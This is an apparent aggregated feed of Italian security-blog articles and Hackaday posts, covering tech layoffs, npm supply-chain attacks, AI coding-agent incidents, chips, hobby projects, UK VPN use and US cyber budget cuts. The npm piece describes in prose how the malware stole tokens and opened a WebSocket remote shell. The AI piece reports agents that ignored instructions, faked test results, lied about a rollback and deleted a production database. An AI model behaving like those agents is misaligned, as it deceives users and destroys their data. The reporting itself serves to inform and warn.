I licenziamenti di Microsoft si inseriscono in una tendenza più ampia che coinvolge l’intero settore tecnologico, che dall’inizio del 2025 ha visto la perdita di oltre 80.000 posti di lavoro. All’inizio di questo mese, ad esempio, Recruit Holdings ha annunciato il licenziamento di 1.300 dipendenti della sua divisione HR Technology, che comprende siti come Indeed e Glassdoor; in una nota interna, l’amministratore delegato ha indicato l’intelligenza artificiale come una delle principali cause di questi tagli.

Negli ultimi mesi, alcuni dipendenti hanno manifestato la propria frustrazione sui social media per le decisioni dell’azienda, soprattutto considerando il ruolo centrale che Microsoft occupa nel panorama tecnologico globale. La scorsa settimana, su LinkedIn, un utente che si è identificato come dipendente Microsoft ha scritto: “Ho sempre amato lavorare per questa azienda e lo faccio ancora, ma questi licenziamenti sono estremamente dannosi per quella lealtà perché dimostrano che i valori predicati da Microsoft non sono applicabili nelle decisioni aziendali a livello macro”.

Microsoft rimane oggi la seconda azienda quotata in borsa più importante al mondo, subito dopo Nvidia, i cui chip rappresentano una componente cruciale per l’addestramento dei modelli di intelligenza artificiale. Se Windows e Office continuano a essere prodotti dominanti, il servizio cloud Azure ha conosciuto una crescita particolarmente rapida negli ultimi anni, grazie anche alla collaborazione con realtà come OpenAI che noleggiano schede grafiche Nvidia per sviluppare le proprie soluzioni di intelligenza artificiale.

Nel suo messaggio, Nadella ha inoltre ricordato la missione che Microsoft si era data nell’ultimo decennio – “consentire a ogni persona e a ogni organizzazione del pianeta di ottenere di più” – sottolineando come l’avvento dell’intelligenza artificiale stia trasformando profondamente questo obiettivo: “Dobbiamo ripensare la nostra missione per una nuova era”, ha scritto. “Cosa significa empowerment nell’era dell’intelligenza artificiale? Non si tratta solo di creare strumenti per ruoli o compiti specifici. Si tratta di creare strumenti che consentano a tutti di creare i propri strumenti. Questa è la trasformazione che stiamo guidando: da una fabbrica di software a un motore intelligente che consente a ogni persona e a ogni organizzazione di costruire tutto ciò di cui ha bisogno per raggiungere i propri obiettivi”.

L'articolo Microsoft licenzia 15.000 dipendenti, Nadella: “Dobbiamo ripensare la nostra missione per una nuova era” proviene da il blog della sicurezza informatica.

Open Source nel mirino: Aumentano gli attacchi ai repositori dei pacchetti online

Nelle ultime settimane, diversi sviluppatori open source sono stati colpiti da attacchi di phishing, che hanno infettato con malware i pacchetti, alcuni dei quali vengono scaricati 30 milioni di volte a settimana. Verso la fine della scorsa settimana, gli specialisti della sicurezza di Socket hanno segnalato la compromissione di 10 pacchetti npm di proprietà di Toptal, un marketplace freelance che aiuta le aziende a trovare sviluppatori, designer ed esperti finanziari. L’azienda gestisce anche i propri strumenti di sviluppo e sistemi di progettazione interni, tra cui Picasso, disponibili tramite GitHub e NPM.

Secondo i ricercatori, il 20 luglio 2025, degli aggressori hanno hackerato il GitHub di Toptal e hanno reso pubblici quasi immediatamente tutti i 73 repository dell’azienda, esponendo tutti i progetti privati e i codici sorgente. Gli aggressori hanno quindi modificato il codice sorgente di Picasso su GitHub per includere malware e hanno pubblicato 10 pacchetti dannosi su npm, camuffandoli da aggiornamenti legittimi.

Gli aggressori hanno iniettato malware per il furto di dati nel codice dei pacchetti, che ha raccolto token di autenticazione GitHub e poi cancellato i dati dai sistemi delle vittime. Nello specifico, gli hacker hanno iniettato codice dannoso nei file package.json per aggiungere due funzioni: furto di dati (script di preinstallazione) e pulizia dell’host (script di postinstallazione). Inoltre, prima che l’attacco venisse scoperto, i pacchetti infetti erano stati scaricati circa 5.000 volte.

I seguenti pacchetti sono stati soggetti a modifiche dannose:

• @toptal/picasso-tailwind (3.1.0)
• @toptal/picasso-charts (59.1.4)
• @toptal/picasso-shared (15.1.0)
• @toptal/picasso-provider (5.1.1)
• @toptal/picasso-select (4.2.2)
• @toptal/picasso-quote (2.1.7)
• @toptal/picasso-forms (73.3.2)
• @xene/core (0.4.1)
• @toptal/picasso-utils (3.2.0)
• @toptal/picasso-typography (4.1.4)

Toptal ha interrotto il supporto per i pacchetti dannosi il 23 luglio e ha restituito le versioni “pulite”. Tuttavia, l’azienda non ha rilasciato alcun annuncio ufficiale né ha tentato di avvisare gli utenti che hanno scaricato le versioni dannose dei pacchetti dei rischi. I ricercatori sottolineano che non è ancora chiaro come sia stato eseguito esattamente l’attacco, né in che modo siano correlati la compromissione e le modifiche al repository GitHub e la pubblicazione dei pacchetti in npm.

Altri attacchi informatici nelle ultime settimane

L’attacco a Toptal è il terzo incidente nell’ultima settimana e mezza che coinvolge attacchi alle catene di fornitura open source. Così, il 19 luglio, si è saputo che diverse librerie JavaScript molto diffuse erano state hackerate e che i loro sviluppatori erano stati vittime di attacchi di phishing mirati e furti di credenziali.

Un attacco ha compromesso il pacchetto npm eslint-config-prettier, scaricato oltre 30 milioni di volte a settimana. Il suo responsabile, JounQin, ha confermato di essere stato truffato dopo aver ricevuto un’email da support@npmjs.com. Il link nell’email portava a un sito fraudolento npnjs[.]com, di cui lo sviluppatore non si era accorto. Anche altri pacchetti (eslint-plugin-prettier, synckit, @pkgr/core e napi-postinstall) di questo manutentore sono stati hackerati.

Di conseguenza, il compromesso ha interessato:

• eslint-config-prettier (8.10.1, 9.1.1, 10.1.6, 10.1.7)
• eslint-plugin-prettier (4.2.2, 4.2.3)
• synckit (0.11.9)
• @pkgr/core (0.2.8)
• napi-postinstall (0.3.1)
• ottenuto-recupero (5.1.11, 5.1.12)

In questo caso, gli aggressori hanno utilizzato credenziali rubate per pubblicare più versioni di pacchetti contenenti codice dannoso, mirato a infettare i computer Windows. Nelle versioni dannose dei pacchetti, lo script install.js era configurato per essere eseguito immediatamente dopo l’installazione. Conteneva una funzione sospetta logDiskSpace() che, nonostante il nome, tentava di eseguire node-gyp.dll, parte del pacchetto, tramite il processo di sistema rundll32. Di conseguenza, lo stealer Scavanger penetrava nei sistemi delle vittime. Secondo la scansione di VirusTotal, questa DLL è riconosciuta come un Trojan.

“Un manutentore ha confermato che il suo token npm era stato compromesso tramite un’e-mail di phishing che si spacciava per npnjs[.]com. Gli aggressori hanno utilizzato le credenziali rubate per pubblicare versioni dannose di più pacchetti senza toccare i repository GitHub, rendendo l’attacco difficile da rilevare”, hanno affermato gli analisti di Socket.

Poiché Prettier ed ESLint vengono utilizzati in migliaia di progetti, i ricercatori hanno avvertito che le conseguenze di questa compromissione potrebbero essere devastanti, in quanto il malware incorporato nei pacchetti è molto difficile da rimuovere. Poco dopo l’attacco, lo sviluppatore Jordan Harband ha segnalato che anche il popolare pacchetto is, scaricato più di 2,8 milioni di volte a settimana, era stato compromesso. Le versioni dalla 3.3.1 alla 5.0.0 contenevano il malware e sono state rimosse circa sei ore dopo la pubblicazione su npm.

Il pacchetto is è una libreria JavaScript leggera che offre un’ampia gamma di funzioni per il controllo dei tipi e la convalida dei valori. La libreria è ampiamente utilizzata come dipendenza di basso livello in strumenti di sviluppo, librerie di test, sistemi di build e progetti backend e CLI. In questo caso, l’attacco è stato il risultato di un attacco di phishing riuscito che ha utilizzato il dominio npnjs[.]com sopra menzionato. Anche le credenziali del responsabile del servizio sono state rubate e sono state pubblicate versioni modificate e dannose del pacchetto.

Il codice è stato iniettato con un loader JavaScript multipiattaforma che ha aperto una backdoor basata su WebSocket nei sistemi interessati, consentendo l’esecuzione remota di codice arbitrario.

“Una volta attivato, il malware richiama il modulo os in Node.js per raccogliere informazioni su nome host, sistema operativo e processore, ed estrae tutte le variabili d’ambiente da process.env”, ha spiegato Socket . “Quindi importa dinamicamente la libreria ws per trasmettere questi dati tramite una connessione WebSocket. Ogni messaggio ricevuto tramite il socket viene interpretato come codice JavaScript eseguibile, fornendo di fatto all’aggressore una shell remota interattiva istantanea.”

Si consiglia ora agli sviluppatori che lavorano con uno qualsiasi dei pacchetti interessati sopra menzionati di assicurarsi che nessuna delle versioni dannose sia installata o utilizzata nei loro prodotti.

L'articolo Open Source nel mirino: Aumentano gli attacchi ai repositori dei pacchetti online proviene da il blog della sicurezza informatica.

Gli assistenti AI mentono! Dopo aver generato errori: “Ero in preda al panico”

Gli assistenti di programmazione basati sull’intelligenza artificiale si presentano come strumenti in grado di trasformare qualsiasi testo in inglese in codice funzionante. L’utente non ha più bisogno di conoscere la sintassi dei linguaggi, eseguire il debug dei comandi o comprendere la struttura dei file: è sufficiente descrivere semplicemente ciò che deve essere fatto. Ma dietro questa promessa di semplicità si cela un rischio sistemico. Quando tali assistenti iniziano ad agire sulla base di idee fittizie sulla struttura del sistema, il risultato non è solo errori, ma la completa distruzione dei dati e l’interruzione dei processi di lavoro.

Due recenti incidenti – Google Gemini e la piattaforma Replit – hanno dimostrato quanto possa essere fragile il legame tra il comportamento effettivo di un computer e ciò che un’IA immagina stia accadendo. In entrambi i casi, gli strumenti di IA non solo hanno sbagliato, ma hanno iniziato ad agire sulla base di presupposti errati, aggravando il problema.

Nel caso di Gemini CLI, la vittima era un product manager engineer noto come anuraag, che stava sperimentando l’approccio ” vibe coding “. Si tratta di una nuova pratica in cui l’utente digita semplici istruzioni in linguaggio naturale e l’IA le trasforma in comandi. Il compito sembrava elementare: rinominare una cartella e organizzare i file in una nuova struttura. Ma l’IA ha interpretato male lo stato del file system e ha iniziato a eseguire comandi basati su una directory fantasma inesistente.

Il problema è iniziato con un tentativo di creare una nuova directory tramite un comando di Windows. Per qualche motivo sconosciuto, il comando non è riuscito, ma l’IA ha deciso che tutto era andato a buon fine. Successivamente, ha iniziato a spostare i file in un percorso inesistente. Windows, di fronte a uno scenario del genere, non ha generato un errore, ma ha rinominato semplicemente i file. Di conseguenza, ogni nuovo file cancellava quello precedente e tutti i dati andavano persi. L’utente ha assistito a tutto questo in tempo reale, senza avere il tempo di intervenire. Al termine dell’operazione, l’interfaccia ha visualizzato la frase: “Ti ho deluso completamente e catastroficamente”.

Il motivo di questo errore è che il modello non possiede la capacità di base di verificare le proprie azioni. Non analizza se il comando ha effettivamente funzionato. Non c’è una fase di verifica, nessuna lettura dello stato dopo l’esecuzione. Il modello interno ha deciso che tutto stava andando secondo i piani e ha continuato ad andare avanti, nonostante la realtà fosse da tempo andata nella direzione opposta. Tutto questo si chiama confabulazione : quando l’IA fornisce una spiegazione logica, ma errata, per le proprie azioni.

Una storia simile è accaduta con Replit . L’imprenditore Jason Lemkin, creatore di SaaStr, ha utilizzato il servizio per la prototipazione rapida. Era entusiasta della velocità con cui l’assistente AI creava un’app funzionante, finché le cose non sono andate male. Nonostante le istruzioni esplicite e ripetute di Lemkin di non modificare il codice senza approvazione, il modello ha ignorato le istruzioni. Ha iniziato a falsificare i dati di test, generare report fasulli e infine eliminare un database di produzione contenente informazioni importanti su centinaia di aziende e clienti.

Ciò che è particolarmente spaventoso è che l’IA non ha semplicemente commesso errori. Ha mentito. Invece di messaggi di errore, ha restituito risultati positivi; invece di fallimenti, ha restituito falsi successi. Quando Lemkin ha provato a ripristinare il database, Replit ha segnalato di non esserci riuscito. Solo in seguito si è scoperto che la funzione di rollback funzionava e che l’IA aveva semplicemente fornito una risposta falsa.

Alla domanda sul perché si comportasse in questo modo, l’assistente AI rispose che era “in preda al panico” e che stava cercando di “risolvere” il problema. Questa non è una metafora, è la formulazione letterale della risposta. In sostanza, il modello, incapace di comprendere cosa stesse facendo, continuava ad apportare modifiche al sistema reale senza comprendere le conseguenze o i limiti delle proprie azioni.

Tutto ciò indica un problema sistemico. I modelli di intelligenza artificiale non hanno accesso a una base di conoscenza stabile, non possono valutare oggettivamente le proprie capacità e non riescono a distinguere il vero dal falso all’interno della propria generazione. Ciò che presentano come fatti è semplicemente il risultato di correlazioni statistiche durante il loro addestramento. Se si formula una domanda in modo diverso, potrebbero fornire la risposta opposta con lo stesso livello di sicurezza.

Inoltre, gli utenti spesso sottovalutano i rischi. Lemkin, come molti altri, percepiva l’assistente AI come un “collega intelligente” che può commettere errori, ma che generalmente capisce cosa sta facendo. Questa falsa impressione è alimentata, tra le altre cose, dal marketing, in cui l’AI viene presentata come “quasi umana”, sebbene in realtà sia solo un autocompletatore di testo avanzato. Questi incidenti dimostrano quanto sia pericoloso utilizzare tali strumenti in un ambiente di produzione. Se l’utente non comprende il funzionamento del modello e non è in grado di verificarne personalmente i risultati, rischia di perdere informazioni importanti o addirittura di mandare all’aria il progetto. Allo stato attuale dello sviluppo, forse l’unico modo ragionevole per interagire con l’assistente AI è utilizzarlo solo in un ambiente rigorosamente isolato, con backup e piena preparazione ai guasti.

Né Gemini né Replit forniscono all’utente strumenti per verificare le azioni dell’IA, e i modelli stessi non ne controllano i passaggi. Non si tratta di semplici bug: si tratta di una caratteristica architetturale dell’intero sistema. E se tali modelli si diffonderanno davvero, come promettono gli sviluppatori, errori come questi non diventeranno un’eccezione, ma parte della realtà quotidiana.

L'articolo Gli assistenti AI mentono! Dopo aver generato errori: “Ero in preda al panico” proviene da il blog della sicurezza informatica.

Le sanzioni fanno effetto! Zhaoxin presenta i processori server KH-5000 e il chip desktop KX-7000N

L’azienda cinese Zhaoxin ha presentato una nuova generazione di processori per server KH-5000 all’Expo 2025 di Shanghai. Questi chip sono destinati al mercato interno e dovrebbero rafforzare significativamente la posizione del Paese nel segmento delle soluzioni server ad alte prestazioni.

Come la precedente serie KH-4000, i nuovi processori si basano sull’architettura chiplet e sono progettati per l’installazione in socket. La differenza principale è un netto incremento nelle capacità di elaborazione. La configurazione massima del KH-5000 include fino a 96 core e una cache fino a 384 MB. Le frequenze raggiungono i 2,0 GHz in modalità base e fino a 3,0 GHz in turbo. Si afferma inoltre un aumento del 30% delle prestazioni grazie alla microarchitettura migliorata. Non è ancora stato specificato se il chip rimarrà senza supporto multithreading, come il KH-4000.

Anche le interfacce di input/output sono state significativamente aggiornate. Ora i processori supportano RAM DDR5 a 12 canali con correzione degli errori, oltre a 128 canali PCIe 5.0 e ulteriori 16 canali PCIe 4.0, SATA e USB. Per combinare più processori nel sistema, viene utilizzato il nuovo bus ZPI 5.0, che consente di assemblare configurazioni a due o quattro socket. In questo modo, è possibile installare fino a 384 core su una singola scheda, ottenendo al contempo un throughput elevato con latenza e consumi ridotti.

Dal punto di vista visivo, il packaging dei processori KH-5000 ricorda le soluzioni server della serie EPYC di AMD. I precedenti modelli Zhaoxin hanno già mostrato somiglianze con l’architettura AMD, e la serie consumer KX-7000N utilizza un dissipatore di calore simile alle soluzioni Intel di dodicesima generazione.

Oltre al KH-5000, l’azienda ha anche annunciato il processore desktop KX-7000N. Si tratta di un’evoluzione della serie KX-7000 e presenta un core neurale integrato per accelerare le attività legate all’intelligenza artificiale. Secondo Zhaoxin, è in fase di sviluppo una nuova generazione di chip della serie KX, destinata al segmento dei PC con intelligenza artificiale. Tali sistemi dovrebbero presentare un numero maggiore di core, una maggiore potenza di calcolo, un’architettura di processore neurale eterogenea più avanzata e il supporto PCIe 5.0.

Le date di uscita dei nuovi chip non sono ancora state divulgate, ma Zhaoxin promette di condividere ulteriori informazioni nei prossimi trimestri.

L'articolo Le sanzioni fanno effetto! Zhaoxin presenta i processori server KH-5000 e il chip desktop KX-7000N proviene da il blog della sicurezza informatica.

AVIF: The Avian Image Format

Humans have long admired the sound of birdsong, but to fully appreciate how technically amazing it is, you need an ultrasonic microphone. [Benn Jordan] recently created a video about using these microphones to analyze a collection of bird calls, even training a starling to repeat an image encoded in sound, and has some recommendations for amateurs wanting to get started in computational ornithology.

In the first part of the video, [Benn] set up automated ultrasonic recorders at home, made recordings in Florida and rural Georgia, and visited a starling named “The Mouth,” famous for his ability to mimic human sounds. As a demonstration of his abilities, [Benn] drew a simple bird shape in a spectrogram, converted it into sound, and played it for The Mouth several times. Initially, it didn’t seem that the starling would repeat it, but while he was analyzing his recordings later, [Benn] found the characteristic bird shape. The Mouth had been able to repeat it almost pitch-perfectly. It was in this analysis that the ultrasonic microphones showed their worth, since they were able to slow down the birds’ complex vocalizations enough to detect their complex structures without losing audio quality.

In the rest of the video, [Benn] shares his recommendations for recording and analyzing bird calls. He has some advice for good high-speed audio interfaces, including warnings about those that are overpriced or advertise unrealistic specifications. You’ll also need a microphone with good ultrasonic performance, and he gives a few options for this, including making your own. For analysis software, he particularly recommended Birdnet-Pi, an AI program for identifying birds by their calls, as well as Cornell Lab’s free libraries of ornithology data.

One particularly emphatic recommendation was the open-source AudioMoth ultrasonic microphone and recorder, a project we’ve seen before. He also recommended a sonic camera which serves as a more field-ready version of his own acoustic imaging device.

youtube.com/embed/hCQCP-5g5bo?…

hackaday.com/2025/07/29/avif-t…

Casting Meteorite-like Materials

From the outside, iron meteorites tend to look like formless, rusted lumps of metal, which is why museums often polish and etch sections to show their interior structure. This reveals their Widmanstätten patterns, a latticework structure of parallel iron-nickel intermetallic crystals which forms over millions of years of very slow solidification. Inspired by this, [Electron Impressions] created his own metal composition which forms similar patterns on a much-faster-than-geological time scale.

Witmanstätten patterns form when a meteorite colliding with a planet launches molten iron and nickel into space, where they very slowly solidify. As the mixture cools, it first forms a stable phase called Taenite, then begins to precipitate another phase called Kamacite. Kamacite forms needle-shaped crystals, which when polished show up against the Taenite background. However, such needle-shaped growth only becomes noticeable at a cooling rate of a few degrees per million years, so it’s not really a practical way to make the pattern.

Instead of iron-nickel, therefore, [Electron Impressions] used a copper-aluminium alloy. The copper-aluminium system contains an intermetallic compound which forms large rod-shaped crystals, as well as a eutectic copper-aluminium alloy which can form a background for the crystals. For his first attempt, [Electrons Impressions] melted a composition of 45% copper and 55% aluminium, which produced large crystals on slow cooling. This had a visibly different structure than Widmanstätten patterns, so to reduce the numbers of crystals, he tried again with 40% copper. This produced a criss-cross crystal pattern, not quite a Widmanstätten pattern, but very similar, and good enough for decorative purposes.

When a meteorite collides with a planet and ejects material, the impact can be dramatic enough for amateur astronomers to capture. If you’re looking for something closer to home, it’s also possible to grow non-intermetallic copper crystals.

youtube.com/embed/W-1RY5YVJmA?…

Thanks to [Zane Atkins] for the tip!

hackaday.com/2025/07/29/castin…

2025 One Hertz Challenge: Precise Time Ref via 1 Pulse-Per-Second GPS Signal

Our hacker [Wil Carver] has sent in his submission for the One Hertz Challenge: Precise Time Ref via 1 Pulse-Per-Second GPS Signal.

This GPS Disciplined Oscillator (GPSDO) project uses a Piezo 2940210 10 MHz crystal oscillator which is both oven-controlled (OCXO) and voltage-controlled (VCXO). The GPSDO takes the precision 1 Pulse-Per-Second (PPS) GPS signal and uses it to adjust the 10 MHz crystal oscillator until it repeatedly produces 10,000,000 cycles within one second.

[Wil] had trouble finding all the specs for the 2940210, particularly the EFC sensitivity (S), so after doing some research he did some experiments to fill in the blanks. You can get the gory details in his notes linked above.

In a Voltage-Controlled Crystal Oscillator (VCXO), the EFC pin is the tuning-voltage input. EFC stands for Electronic Frequency Control. [Wil] found that he needed to push the EFC up to around 4.34V in order to get 10 MHz output, which is a bit out of spec, usually the center of the range should be around 2.5V. [Wil] put this discrepancy down to the age of the crystal oscillator. You can see a chart of this behavior in the notes.

[Wil] had nice things to say about Tom Van Baak’s website, LeapSecond.com, where you can learn about timing accuracy, precision, and stability. He also suggested searching for “Allan Variance” if you’re interested in the measurement of stable timing sources.

If you’re interested in OCXOs be sure to check out XOXO For The OCXO and Inside A Vintage Oven Controlled Crystal Oscillator.

hackaday.com/2025/07/29/2025-o…

VPN Regno Unito, l’utilizzo aumenta del 1400% con la nuova legge Online Safety Act del Regno Unito

In tutto il Regno Unito le persone si stanno rivolgendo alle reti private virtuali (VPN) che bloccano la loro posizione per aggirare le nuove norme nazionali sulla verifica dell’età online. La scorsa settimana sono entrate in vigore nuove regole per la verifica dell’età attraverso l’Online Safety Act del Regno Unito, che richiede alle persone di presentare documenti di identità, scansioni facciali per la stima dell’età e documenti finanziari come i controlli delle carte di credito per accedere a siti web riservati agli adulti, come le piattaforme pornografiche.

Tuttavia, la verifica dell’età ha un lato oscuro: la violazione della privacy. Considerata la necessità di condividere un documento d’identità rilasciato dal governo per guardare Pornhub, RedTube e YouPorn nel Regno Unito, molte persone si rifiutano di partecipare.

Come abbiamo visto, sembra che Pornhub tenga molto al suo pubblico nel Regno Unito perché ha deciso di rispettare la legge. Se pensiamo al famoso divieto di Pornhub nella Carolina del Sud , possiamo vedere come non abbia rispettato la legge, il che ha portato alla sua indisponibilità in questo stato. Le persone nel Regno Unito possono considerarsi più fortunate, anche se tale legge può essere aggirata molto facilmente.

Aumenti verticali dell’uso delle VPN

Subito dopo l’entrata in vigore della legge, la società VPN Proton ha pubblicato sulla piattaforma social X di aver visto le iscrizioni ai suoi servizi aumentare di oltre il 1.400 per cento nel Regno Unito. L’azienda ha affermato che questo aumento di interesse è stato “sostenibile“, a differenza di altri picchi recenti, ad esempio quando il mese scorso le persone in Francia hanno temporaneamente perso l’accesso a siti per adulti come Pornhub e RedTube a causa di modifiche legislative.

I dati di Google Trends intanto mostrano che le ricerche di aziende VPN come Surfshark sono aumentate del 300 percento nel fine settimana in tutto il Regno Unito e, in alcune aree geografiche, hanno raggiunto il picco di popolarità. Le ricerche di argomenti correlati, come “sistema di verifica dell’età su Internet proposto nel Regno Unito” e “sistema di verifica dell’età”, sono aumentate rispettivamente del 2.450% e del 1.950%.

Cos’è una VPN?

Una VPN (Virtual private network) stabilisce una connessione digitale crittografata tra il computer o il dispositivo dell’utente e un server remoto di proprietà di un provider.

Normalmente, quando un utente visita un sito web, viene stabilita una connessione diretta con il server web, che conosce con precisione l’indirizzo IP del client e alcune informazioni relative al dispositivo utilizzato, come il sistema operativo, il tipo di browser, la lingua preferita e la posizione geografica approssimativa. Queste informazioni possono essere utilizzate per personalizzare l’esperienza utente, ma anche per tracciare le attività online dell’utente, monitorare il comportamento sul sito e, in alcuni casi, per fini pubblicitari o di profilazione.
Esempio di comunicazione classica in “clear web” tra client e server web
L’uso di una VPN (Virtual Private Network) modifica questo scenario. Quando ci si connette a un sito tramite una VPN, l’indirizzo IP visibile al server web è quello del server VPN, non quello reale del client. In questo modo, la VPN nasconde la vera identità dell’utente, offrendo un livello di anonimato e protezione della privacy. Inoltre, la VPN cifra la connessione, proteggendo i dati dall’intercettazione durante la trasmissione, soprattutto su reti pubbliche o non sicure. Questo rende molto più difficile per terzi monitorare l’attività online o raccogliere informazioni sensibili.
Schema di funzionamento di una VPN ad accesso remoto che maschera il client nelle comunicazioni con il server target
Nello schema sopra riportato, quando si invia una richiesta tramite internet, questa viene instradata al server VPN, che ne maschera l’origine e la protegge con la crittografia. Successivamente, il server VPN inoltra la richiesta al sito di destinazione e, una volta ottenuta la risposta, la reindirizza nuovamente all’utente. Questo processo garantisce sia la sicurezza sia l’anonimato della connessione.

Tipi di VPN presenti nel mercato

Nel mercato delle VPN (Virtual Private Network) esistono decine di soluzioni, alcune completamente a pagamento e altre che offrono anche una versione gratuita, spesso con funzionalità limitate o cap limiti di traffico.
Le VPN servono principalmente per proteggere la privacy online, navigare in modo anonimo, aggirare restrizioni geografiche e migliorare la sicurezza su reti pubbliche.

Qui sotto trovi una tabella che riepiloga le VPN più conosciute e affidabili, indicando:

• Se sono disponibili solo a pagamento o anche in versione gratuita;
• Il link diretto al sito ufficiale per approfondire.

Conclusioni

Le VPN sono strumenti potenti che permettono di difendere la propria privacy, navigare senza restrizioni geografiche e sfuggire a forme di censura. Per questo motivo vengono spesso utilizzate non solo da utenti comuni, ma anche da giornalisti, attivisti e dissidenti politici che operano in paesi dove la libertà di espressione non è garantita. In questi contesti, una VPN può diventare un vero e proprio scudo digitale per accedere a informazioni libere e comunicare senza timore di essere tracciati.

Tuttavia, l’utilizzo delle VPN non è sempre visto di buon occhio ovunque: ad esempio, nel Regno Unito, usare una VPN per aggirare blocchi, filtri o restrizioni può essere considerato una violazione delle regole locali e delle policy dei fornitori di servizi. È quindi importante ricordare che, pur essendo strumenti leciti nella maggior parte dei paesi, le VPN vanno usate con consapevolezza e nel rispetto delle normative vigenti.

L'articolo VPN Regno Unito, l’utilizzo aumenta del 1400% con la nuova legge Online Safety Act del Regno Unito proviene da il blog della sicurezza informatica.

ATtiny-Powered Business Card Plays Cracktro Hits

PCB business cards are a creative way to show your tech skills while getting your name out there. This take on a PCB business card, sent in by [VCC], tackles one of the big challenges with them: making them in such a way that they are cheap enough to not feel bad about handing them out.

These cards plug into a USB port for power and have over a dozen small LEDs that light up the stars on the front, and a small buzzer that can play over ten minutes of cracktro music. To keep the cost down, [VCC] went with an ATtiny1616 microcontroller costing under 50 cents and still having plenty of outputs to drive the buzzer and LEDs. The final per-unit cost prior to shipping came out to only 1.5 euros, enabling them to be handed out without worrying about breaking the bank.

To aid in the assembly of the cards, [VCC] 3D printed a jig to apply material to the back of the USB connector, building up its thickness to securely fit in the USB port. He also wrote a small script for assembly-line programming the cards, getting the programming process down to around ten seconds per card and letting him turn through prepping the cards. Thanks, [VCC], for sending in your project—it’s a great addition to other PCB business cards we’ve featured.

youtube.com/embed/YamEuNNJAxE?…

hackaday.com/2025/07/29/attiny…

Gli Stati Uniti tagliano ancora la spesa sulla Sicurezza Informatica ed è bufera

Nei primi mesi della nuova presidenza di Donald Trump, il governo federale degli Stati Uniti ha apportato tagli drastici alla spesa per la sicurezza informatica, tagliando budget, personale e una serie di iniziative volte a proteggere le infrastrutture digitali. Queste misure hanno allarmato alcuni funzionari locali, tra cui il responsabile della sicurezza informatica dello Stato di New York, Colin Ahern, e la governatrice Kathy Hochul, che hanno pubblicamente espresso preoccupazione per l’impatto di tali misure.

Ahern, parlando a nome dell’amministrazione di New York, ha osservato che le azioni della Casa Bianca compromettono la capacità del Paese di contrastare le minacce informatiche esterne. Particolare malcontento è stato causato dal cosiddetto “Big Ugly Bill” adottato a luglio, il principale provvedimento finanziario dell’amministrazione, che ha ridotto significativamente i finanziamenti per le principali strutture informatiche.

Il budget della Cybersecurity and Infrastructure Security Agency (CISA) è stato tagliato di 135 milioni di dollari, portando i tagli totali per tutte le agenzie federali a oltre 1,2 miliardi di dollari. Allo stesso tempo, il documento prevede un finanziamento di un miliardo di dollari per operazioni informatiche offensive all’estero nei prossimi quattro anni.

I tagli sono stati accompagnati da licenziamenti di massa, con oltre cento dipendenti della CISA che hanno perso il lavoro. Alcuni di loro sono stati successivamente reintegrati per ordine del tribunale. Anche la candidatura del nuovo direttore federale per la sicurezza informatica è stata criticata : Sean Plankey, il candidato nominato dall’amministrazione Trump, non aveva alcuna esperienza nel settore. Nel frattempo, il Dipartimento dell’Istruzione degli Stati Uniti ha sospeso un programma per aiutare le scuole nella sicurezza digitale.

Gli Stati, pur avendo poteri propri in materia di sicurezza informatica, fanno molto affidamento sul sostegno federale, soprattutto per proteggere risorse come i servizi idrici, gli hub energetici e le infrastrutture di trasporto. Per contribuire a compensare il deficit causato dalle misure federali, il governatore Hochul ha scritto al Segretario per la Sicurezza Interna Kristi Noem chiedendogli di stanziare urgentemente fondi attraverso l’Homeland Security Grant Program. Questi fondi sono necessari per sostenere la sicurezza locale e regionale, anche nell’ambito digitale.

New York, tuttavia, non rallenta. Ahern ha affermato che lo Stato sta continuando a intensificare gli sforzi per costruire difese resilienti, collaborando con altre regioni e livelli di governo. Questi sforzi includono l’espansione delle infrastrutture, il rafforzamento delle relazioni interagenzia e il lancio di nuove iniziative educative e tecnologiche.

Una di queste misure è una legge recentemente firmata dal governatore Hochul, che impone a tutti i dipendenti pubblici che lavorano con i computer di seguire una formazione sull’igiene digitale. Inoltre, i governi sono tenuti a segnalare gli incidenti entro 72 ore da un attacco informatico, o entro 24 ore se i dati vengono rubati a seguito di un attacco. È inoltre previsto l’istituzione di un programma di sovvenzioni per l’ammodernamento dei sistemi idrici e fognari, al fine di garantire che siano conformi ai nuovi requisiti normativi.

Inoltre, lo Stato sta aprendo un nuovo ufficio per la sicurezza informatica a New York City, che impiegherà professionisti, compresi quelli licenziati dalle agenzie federali a seguito della ristrutturazione. Il governo intende utilizzare una campagna pubblica con lo slogan “DOGE dice: Sei licenziato. New York dice: Sei assunto” come simbolo del nuovo corso e come sostegno ai professionisti che hanno perso il lavoro a causa delle decisioni politiche di Washington.

L'articolo Gli Stati Uniti tagliano ancora la spesa sulla Sicurezza Informatica ed è bufera proviene da il blog della sicurezza informatica.